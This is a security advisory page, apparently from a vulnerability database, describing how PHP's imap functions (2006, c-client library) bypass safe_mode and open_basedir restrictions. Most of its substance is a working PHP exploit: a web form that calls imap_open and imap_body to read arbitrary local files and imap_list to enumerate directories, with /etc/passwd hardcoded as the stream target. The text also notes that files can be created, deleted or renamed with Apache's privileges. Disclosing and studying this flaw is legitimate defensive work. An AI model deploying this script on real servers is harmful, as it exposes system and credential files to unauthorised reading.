(PHP) imap functions bypass safemode and open_basedir restrictions

2006-02-28 / 2006-03-01
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Vulnerability in c-client library (tested with versions 2000,2001,2004), mail_open could be used to open stream to local files. For php and imap module imap_open allow to bypass safemode and open_basedir restrictions. Use imap_body or others to view a file and imap_list to recursively list a directory. s/mailbox/file :) imap_createmailbox imap_deletemailbox imap_renamemailbox to create,delete,rename files with apache privileges. ##### code ##### <form action="" method="post"> <select name="switch"> <option selected="selected" value="file">View file</option> <option value="dir">View dir</option> </select> <input type="text" size="60" name="string"> <input type="submit" value="go"> </form> <?php $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { $stream = imap_open($string, "", ""); if ($stream == FALSE) die("Can't open imap stream"); $str = imap_body($stream, 1); if (!empty($str)) echo "<pre>".$str."</pre>"; imap_close($stream); } elseif ($string && $switch == "dir") { $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo "<pre>"; for ($i = 0; $i < count($dir_list); $i++) echo "$dir_list[$i]n"; echo "</pre>"; imap_close($stream); } ?> ################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top